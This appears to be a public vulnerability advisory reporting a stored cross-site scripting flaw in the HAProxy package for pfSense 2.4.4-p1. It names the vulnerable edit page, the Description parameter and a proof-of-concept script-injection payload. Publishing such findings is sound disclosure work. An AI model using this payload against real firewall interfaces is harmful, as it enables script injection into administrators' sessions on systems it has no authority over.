pfSense 2.4.4-p1 (HAProxy Package 0.59_14) - Stored Cross-Site Scripting

2019-02-15 / 2019-02-20
dk Gionathan Reale (DK) dk
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

################################################################################################################################## # Exploit Title: pfSense 2.4.4-p1 (HAProxy Package 0.59_14) - Stored Cross-Site Scripting # Date: 13.02.2019 # Exploit Author: Gionathan "John" Reale # Vendor Homepage: https://www.pfsense.org # Version: 2.4.4-p1/0.59_14 ################################################################################################################################## Introduction pfSense® software is a free, open source customized distribution of FreeBSD specifically tailored for use as a firewall and router that is entirely managed via web interface. In addition to being a powerful, flexible firewalling and routing platform, it includes a long list of related features and a package system allowing further expandability without adding bloat and potential security vulnerabilities to the base distribution. HAProxy is free, open source software that provides a high availability load balancer and proxy server for TCP and HTTP-based applications that spreads requests across multiple servers. ################################################################################# Example: URL https://192.168.1.1/haproxy/haproxy_listeners_edit.php PARAMETER Description PAYLOAD "><script>alert("test")</script>


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top